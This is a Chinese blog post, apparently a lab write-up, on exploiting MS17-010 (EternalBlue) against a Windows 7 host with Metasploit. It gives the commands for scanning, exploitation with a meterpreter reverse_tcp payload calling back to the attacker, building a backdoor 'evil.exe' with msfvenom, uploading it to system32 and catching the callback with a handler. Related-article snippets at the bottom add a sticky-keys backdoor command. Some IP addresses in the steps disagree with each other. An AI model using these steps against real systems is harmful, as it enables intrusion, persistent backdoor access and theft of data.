利用ms17-010 远程执行漏洞渗透Win7,并留下后门

最新推荐文章于 2024-06-12 10:35:43 发布
最新推荐文章于 2024-06-12 10:35:43 发布
阅读量4.3k 收藏 26
点赞数 2
分类专栏: CVE&&漏洞 文章标签: Meterpreter 渗透练习 后门程序
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40624810/article/details/96462725
版权

一、环境准备

主机 kali :192.168.115.134

靶机win7x64:192.168.115.133

二、渗透

Metasploit 指令学习:https://blog.csdn.net/tan6600/article/details/46845793

这里利用的是win7的ms17-010 远程执行漏洞

先使用auxiliary/scanner/smb/smb_ms17_010这个模块进行漏洞的分析,看看这个445端口是否能被入侵

先show options查看这个模块的选项,在Required那列中,yes的是必填的,no是选填的,默认帮我们已经写好了大部分的参数,但我们还是要手动设置一下RHOSTS的参数,即指定的主机ip,这里我们写被攻击的win7的ip

set RHOSTS 192.168.115.113

接着输入run执行探测

显示表明可以利用该漏洞

开始使用攻击模块

msf > use exploit/windows/smb/ms17_010_eternalblue

msf > set payload windows/x64/meterpreter/reverse_tcp

msf exploit(ms17_010_eternalblue) > set lhost 192.168.115.134

lhost 192.168.115.134

msf exploit(ms17_010_eternalblue) > exploit

成功拿到shell

二、后门程序

1、用msfvenom生成后门程序

参考:https://blog.csdn.net/itest_2016/article/details/76984455

新版本的msf中已经由msfvenom取代了之前的msfpayload,所以这里我们用msfvenom来生成恶意文件。在/root下生成evil.exe文件。


msfvenom -pwindows/meterpreter/reverse_tcp lhost=192.168.17.26 lport=9999 -f exe > /root/evil.exe

 

生成结束之后我们需要把这个后门传递到被攻陷的目标主机,实际中可能是通过webshell、上传漏洞、先导马等等。传递到目标主机之后直接运行既可以得到一个meterpreter回话。这里我们获得了shell利用upload命令将文件传送到靶C:\windows\system32目录下。注意:目标路径要用\\。

可以看到靶机下已经接收到了后门程序文件。

此时需要现在攻击者的主机上启用监听,来接收来自后门的信息。

注意:我们要断开现在已有的连接

启动监听

msf > use exploit/multi/handler 
msf exploit(handler) > set lhost 192.168.115.134
msf exploit(handler) > set lport 9999
msf exploit(handler) > exploit

被攻陷主机运行后门之后:

注意:可以将后门程序附加在开机启动项或者进程中,这里我们在靶机假装不知道它是后门程序双击启动evil.exe

监控端显示有一个连接

成功得到一个meterpreter会话。

这个时候攻击者就可以通过这个meterpreter来执行系统命令、提权、提取敏感数据、内网横向渗透等操作。(当然我都不会2333)

可以用一个有趣的

参考:https://blog.csdn.net/nzjdsds/article/details/77916706

通过

在/root/AzitvgoJ.jpeg下可以查看到靶机的屏幕截图

非常感谢!!!  

qq_40624810
关注
  • 2
    点赞
  • 26
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
使用 ms17-010 永恒之蓝漏洞win7 进行渗透及建立永久后门
Cwillchris的博客
05-28 620
最详细永恒之蓝渗透和后渗透教程
专注于win7官网,专注win7系统安装
qq_29508575的博客
11-12 1225
不知不觉,微软宣布停止对Win7的技术支持已过去几个月,期间不断有小伙伴问专注于Win7什么时候更新.专注于win7的官网又是什么,下面来看看专注于win7唯一官网是什么的介绍. 专注于win7官网 不知不觉中,微软宣布停止对Win7的技术支持已经过去几个月了,期间不断有小伙伴问Win7何时更新。 今年2月更新10.2:00,吻妻表示会进一步调整专注于win7系列作品的更新节奏。当时只说后续更新,没有提到具体的更新规,但是最近每天都有朋友问Win7会不会更新。何时更新? 为更加专注于做好作品,将
恶意网站可利用这个新漏洞拖垮Windows 7和Windows 8电脑
weixin_33850015的博客
08-01 105
这个月对于Windows 7用户来说真是糟透透顶。到处传播的WannaCry勒索病毒让大多数Windows 7电脑受到影响。现在,人们又发现了一种新的漏洞,它可以拖慢甚至拖垮Windows 7和Windows 8电脑。 据悉,这个漏洞允许邪恶网站在目录路径载入带有“$MFT”名称的图片。Windows利用$MFT来指代NTFS文件系统使用的特殊元数据...
win7永恒之蓝复现(一)
最新发布
qq_63831588的博客
06-12 1029
今天来记录一下我的第一个漏洞学习,win7永恒之蓝漏洞的心路历程,我会分享我学习的过程,以及我学习过程中遇到的问题,并且附上相应的解决方法,大家一起学习一起进步!我们来分析一下,首先由于永恒之蓝是基于445端口的,这里我们可以看到445是开放的(这是基本条件,如果没有开放我们要手动开放一下,不过445一般是默认开放的),其次我们可以看到下面扫到了ms17-010(永恒之蓝的漏洞代号)这个漏洞,这就说明我们的win7中有这个漏洞,我们可以进行复现!
永恒之蓝ms17-010漏洞利用(提取meterpreter权限获取shell,进入windows 远程操控主机)
热门推荐
qq_42527761的博客
07-19 1万+
最近在学习The-Hacker-Playbook-3这本书,书中介绍的红队的第一个核心工具:Metasploit 框架,尽管 Metasploit 框架从 2003 年开发的,但它现在仍然是一个非常棒的工具。有最初的开发者 H.D. Moore 和非常活跃的社区为它提供持续支持。这个社区的驱动的框架,拥有着所有最新的公开漏洞利用、后渗透利用模块、辅助模块等等。对于红队项目,我们可以使用 Metasploit 通过MS17-010永恒之蓝漏洞危害内部系统,以获得我们的第一个内网 shell,或者
windows下后门技术(netcat篇)
d_0xff的博客
05-25 1万+
由于这次ctf的失利,来补习一下知识吧!windows下后门环境 win7 nc.exe假设用administrator登陆用nc创建了一个后门,Netcat 功能比较单一, 缺少了许多我们渗透工作中需要的功能。为此我们将创建一个便携式的工具包来解决这个问题便携式工具(Portable Applications)便携式工具是那些不需要安装就能直接使用的程序,它们往往将所有的执行环境和核心程序本身一
ElasticSearch 远程代码执行漏洞分析(CVE-2015-1427)&高级利用方法1
08-08
ElasticSearch 远程代码执行漏洞分析(CVE-2015-1427)&高级利用方法1 ElasticSearch 是一个基于 Lucene 的搜索引擎,提供了强大的搜索功能。然而,在 2015 年,一种远程代码执行漏洞(CVE-2015-1427)被发现,影响...
jackson-CVE-2020-8840:FasterXMLjackson-databind远程代码执行漏洞
03-08
远程代码执行漏洞是一种极其危险的安全漏洞,攻击者可以利用它在受害者的系统上执行任意代码,从而控制或破坏系统。对于Jackson-CVE-2020-8840,问题在于Jackson-databind在反序列化JSON数据时的不安全配置。当...
使用metasploit攻击实例讲解1-ms10-046快捷方式图标漏洞
12-29
7. **清理和报告**:渗透测试完成后,必须清除所有痕迹,并生成详细的测试报告,包括测试方法、发现的漏洞利用过程以及建议的修复措施。 学习如何使用Metasploit进行渗透测试是提升网络安全技能的重要环节。同时...
CVE-2020-8813:Cacti v1.2.8远程代码执行CVE-2020-8813的官方漏洞利用
03-08
**CVE-2020-8813:Cacti v1.2.8 远程代码执行漏洞详解** Cacti是一款广泛使用的开源网络监控工具,它提供了图形化的界面来显示网络设备的性能数据,如流量、CPU利用率、内存使用情况等。在2020年,Cacti被发现存在...
LiqunKit-1.6.2 综合漏洞利用工具交流版,后门自测,建议虚拟机使用
04-08
LiqunKit-1.6.2是一款专为网络安全专业人士设计的综合漏洞利用工具,它允许用户进行后门自测,确保系统或网络的安全性。本文将深入探讨这款工具的功能、用途以及使用时的注意事项。 首先,LiqunKit的核心功能在于...
服务器后门(cmd使用)
03-24
服务器后门
为3389开后门
weixin_34314962的博客
03-13 193
copy c:\windows\explorer.exe c:\windows\system32\sethc.exe copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\seth.exe attrib c:\windows\system32\sethc.exe +h attrib c:\wind...
Windows留后门--教程(二)——Windows计划任务后门
W小哥
03-15 4472
一、Windows计划任务后门介绍 计划任务是经常被攻击者拿来利用的控制点,计划任务可以让目标主机在特定的时间执行我们预先准备的后门程序从而帮助我们进行权限维持。 二、Windows计划任务后门-教程 前提条件: 假设在攻击的过程中通过利用各种getshell,已经拿到目标服务器administrator权限 环境: windows Server2012 IP: 192.168.226.128 2.1 利用MSF生成一个EXE类型的后门木马 2.2 创建计划任务 2.3 监听返回的shell 三、Win
渗透测试实战-漏洞利用MS17-010
09-26 444
渗透测试实战-漏洞利用MS17-010
永恒之蓝漏洞利用MS17-010)获取shell 及获取靶机屏幕截图
沙罗沙罗的博客
05-09 4123
永恒之蓝漏洞利用MS17-101) 文章目录永恒之蓝漏洞利用MS17-101)一、永恒之蓝(MS17-101)介绍二、漏洞利用1.检测目标主机是否存在MS17-101漏洞2.使用msf攻击模块执行攻击总结 提示:以下是本篇文章正文内容,下面案例可供参考 一、永恒之蓝(MS17-101)介绍 漏洞名称:“永恒之蓝”漏洞 漏洞编号:MS17-010,CVE-2017 0143/0144/0145/0146/0147/0148 漏洞类型:缓冲区溢出漏洞 漏洞影响:信息泄露 CVSS评分:9.3(High)
ms17-010(永恒之蓝) 漏洞复现与处理
diaobusi的博客
06-05 1万+
ms17_010 是一种操作系统漏洞,仅影响 Windows 系统中的 SMBv1 服务。这个漏洞是由于 SMBv1 内核函数中的缓冲区溢出而导致的。攻击者可以通过该漏洞控制目标系统,并执行任意代码。这个漏洞通过 445 文件共享端口进行利用,一旦攻击者成功利用漏洞,就可以在目标主机上植入各种恶意软件,如勒索软件。最近出现的 WannaCry 勒索软件就使用 ms17_010 漏洞来传播和植入勒索代码,将目标系统中的所有文件加密并威胁用户付款。
入侵电脑留后门
毛兴宇
12-15 1万+
从某种意义上说,服务器被攻击是不可避免的,甚至被控制也情有可原。但绝对不能容忍的是,服务器被植入后门,攻击者如入无人之境,而管理者去浑然不觉。本文将对当前比较流行的后门技术进行解析,知己知彼方能杜绝后门。   1、放大镜后门   放大镜(magnify.exe)是Windows2000/XP/2003系统集成的一个小工具,它是为方便视力障碍用户而设计的。在用户登录系统前可以通过“Win
使用MSF渗透攻击win7主机并远程执行命令
weixin_43991459的博客
06-15 3115
Win7 网络连接检查命令: Linux下: auxiliary是辅助模块用命令找寻关于ms17_010 的可运行模块用 指令,调用模块进行扫描,侦察靶机是否具备被攻击的条件通过 查看需要配置的参数,并用set进行配置,后面显示yes的必须设置若为【-】 以上说明已经打了改漏洞的补丁 刚才这个过程,是通过辅助模块探测目标主机的系统是否存在该漏洞。 下图的目标主机存在该漏洞 设置完成后出现【+】表示可以入侵 水印遮挡内容为: 开始加载使用入侵模块,进行入侵使用 指令查看可以使用的攻击载荷 若失败将靶机
永恒之蓝漏洞渗透测试Win7系统实验中遇到的问题与解决方法
06-12
在进行永恒之蓝漏洞渗透测试Win7系统实验的过程中,可能会遇到以下问题: 1. 漏洞扫描器无法扫描到永恒之蓝漏洞:这可能是因为目标系统已经安装了相关的安全补丁。解决方法是查看目标系统的安全补丁情况,或使用...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值